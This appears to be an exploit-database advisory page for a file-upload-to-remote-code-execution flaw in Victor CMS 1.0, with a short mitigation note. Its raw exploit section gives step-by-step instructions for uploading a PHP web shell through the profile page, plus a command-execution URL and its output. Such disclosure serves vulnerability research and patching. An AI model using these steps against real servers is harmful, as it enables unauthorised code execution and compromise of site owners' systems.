header-logo
Suggest Exploit
vendor:
CMSsite
by:
Mosaaed
9.8
CVSS
HIGH
Remote Code Execution
434
CWE
Product Name: CMSsite
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:victor_alagwu:cms_site
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Apache2/Linux
2020

Victor CMS 1.0 – File Upload To RCE

Victor CMS 1.0 is vulnerable to a file upload vulnerability which allows an attacker to upload a malicious PHP file and execute arbitrary code on the server. An attacker can register on the website, login as a user, go to the profile page, upload a malicious PHP file, update the user and then access the file in the img folder. The attacker can then execute arbitrary code on the server by accessing the file with a command parameter.

Mitigation:

The application should validate the file type before allowing the user to upload it. The application should also restrict the user from uploading files to the web root directory.
Source

Exploit-DB raw data:

# Exploit Title: Victor CMS 1.0 - File Upload To RCE
# Date: 20.12.2020
# Exploit Author: Mosaaed
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0

# Tested on: Apache2/Linux

Step1: register http://localhost/CMSsite-master/register.php
step2: login as user
step3: Go to Profile 
step4: upload imag as php file (upload shell.php)
step5: update user 
step6: You will find your shell in img folder :/path/img/cmd.php

http://localhost/CMSsite-master/img/cmd.php?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Navigation

Suggest Exploit

Services By CQR